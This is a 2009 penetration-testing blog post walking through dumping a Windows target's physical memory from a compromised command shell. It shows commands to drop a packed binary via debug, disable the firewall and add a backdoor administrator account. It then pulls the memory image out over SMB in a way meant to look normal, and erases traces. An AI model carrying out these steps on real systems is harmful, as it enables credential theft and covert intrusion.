Dumping Memory thru Command Shell
Tuesday, March 10, 2009 at 4:05PM
Carlos Perez

Since in my last post I covered how to do this in meterpreter with the script I wrote, I decided to show how to do the same from command shell and you will see why I love Meterpreter and scripting Meterpreter so much!!

We start by downloading mdd in to our Backtrack4 machine.

root@bt:/pentest/windows-binaries# wget http://voxel.dl.sourceforge.net/sourceforge/mdd/mdd_1.3.exe        --2009-03-10 14:01:49--  http://voxel.dl.sourceforge.net/sourceforge/mdd/mdd_1.3.exe
Resolving voxel.dl.sourceforge.net... 72.26.194.82
Connecting to voxel.dl.sourceforge.net|72.26.194.82|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 95104 (93K) [application/octet-stream]
Saving to: `mdd_1.3.exe'
100%[=================================================================>] 95,104       175K/s   in 0.5s
2009-03-10 14:01:49 (175 KB/s) - `mdd_1.3.exe' saved [95104/95104]

We will be using exe2bat.exe that is available in the /pentest/windows-binaries/tools to be able to use this tool the executable has to be 64k or less do to the limitations of the windows debug command. When we check the size of the executable we can see that it is 93k of size.

root@bt:/pentest/windows-binaries# ls -lh mdd*
-rw-r--r-- 1 root root 93K 2009-01-27 12:48 mdd_1.3.exe

We can compress the executable with UPX so as to be able to meet the 64k requirement, in Backtrack4 it will have to be installed using apt-get.

root@bt:/pentest/windows-binaries# upx -2 -o mdd.exe mdd_1.3.exe
                       Ultimate Packer for eXecutables
  Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007
UPX 3.01        Markus Oberhumer, Laszlo Molnar & John Reiser   Jul 31st 2007
        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     95104 ->     55168   58.01%    win32/pe     mdd.exe
Packed 1 file.

As you can see the executable is know 55k in size. In Backtrack 4 we use wine to run the exe2bat.exe executable to convert the exe into a batch file that we can paste in shell that will use debug to generate our executable on the target host.

root@bt:/pentest/windows-binaries/tools# wine exe2bat.exe ../mdd.exe mdd.txt                               
Finished: ../mdd.exe > mdd.txt

We take the content of the mdd.txt and paste it into our command shell, you will see that you might get an error on the last line pasted, this is expected.

c:\Windows\System32>copy 1.dll ../mdd.exe
The syntax of the command is incorrect.

The problem was the case of the dll name (first time I have ever noticed that copy is case sensitive).

c:\Windows\System32>copy 1.dll ../mdd.exe
The syntax of the command is incorrect.
c:\Windows\System32>copy 1.DLL mdd.exe
        1 file(s) copied.
c:\Windows\System32>mdd
 -> mdd
 -> ManTech Physical Memory Dump Utility
    Copyright (C) 2008 ManTech Security & Mission Assurance
 -> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
    This is free software, and you are welcome to redistribute it
    under certain conditions; use option `-c' for details.
 -> ERROR: must specify output filename; use -h for usage
c:\Windows\System32>

We can perform a check of the size of the physical memory on the target host with systeminfo this will give us an estimate of the image file that will be generated.

c:\Windows\System32>systeminfo | find /i "physical"
Total Physical Memory:     3,070 MB
Available Physical Memory: 859 MB

Now that mdd is on the target machine we can make an image of the memory, and dumping it locally.

c:\Windows\System32>mdd.exe -o memimg.dd
 -> mdd
 -> ManTech Physical Memory Dump Utility
    Copyright (C) 2008 ManTech Security & Mission Assurance
 -> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
    This is free software, and you are welcome to redistribute it
    under certain conditions; use option `-c' for details.
 -> Dumping 3070.34 MB of physical memory to file 'memimg.dd'.
 773770 map operations succeeded (0.98)
 12236 map operations failed
 took 137 seconds to write
 MD5 is: 888b9663c5d760f36f5b948ed92bef23

Once the image has been made we can use several methods to transfer the image to our target machine, this may be by tfpt, scripting ftp, mounting a share from our machine that we configured with samba or we can even create a share of our own and connect to it.  I will demonstrate the task of creating a share since it might be the most useful when working in large teams against a single target host and most of the steps can be of use to others in different scenarios, we can share the folder and disable the local built in firewall to be able to gain access to the share.

c:\Windows\System32>net share img=c:\windows\system32

img was shared successfully.

c:\Windows\System32>netsh.exe firewall set opmode disable
Ok.

Before we create and account we can check the Account Security Policy settings so as to save time by not doing trial and error on password length while creating our account for access.

c:\Windows\System32>net accounts
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          455
Minimum password length:                              12
Length of password history maintained:                6
Lockout threshold:                                    10
Lockout duration (minutes):                           60
Lockout observation window (minutes):                 5
Computer role:                                        WORKSTATION
The command completed successfully.

Now that we know the password length we can create and account and add it to the local Administrators we will use this account to mount the share we created.

c:\Windows\System32>net user /add SUPPORT_3089 P@ssword0001
The command completed successfully.
c:\Windows\System32>net localgroup Administrators /add SUPPORT_3089
The command completed successfully.

Next we mount the share on our machine with the  smbmount command and the credential of the user we created.

root@bt:/pentest/windows-binaries/tools# smbmount //192.168.1.192/img /mnt/img -o user=SUPPORT_3089,pass=P@ssword0001

Now that we have mounted the share we can copy over the file, this will look for anyone looking like a normal file transfer. As you will can see the image size is of 3GB.

root@bt:/mnt/img# ls -lh memimg.dd
-rwxrwSrwx 1 root root 3.0G 2009-03-10 14:50 memimg.dd

Once we have copied over the image we must perform clean up of everything we did on the target host.

c:\Windows\System32>del memimg.dd
c:\Windows\System32>del mdd.exe
c:\Windows\System32>net share /del img
img was deleted successfully.
c:\Windows\System32>net user /del SUPPORT_3089

The command completed successfully.

c:\Windows\System32>netsh firewall set opmode enable
Ok.

I hope you have found this post of great use and please do share opinions and ideas.

Article originally appeared on Security and Networking (http://darkoperator.squarespace.com/).
See website for complete article licensing information.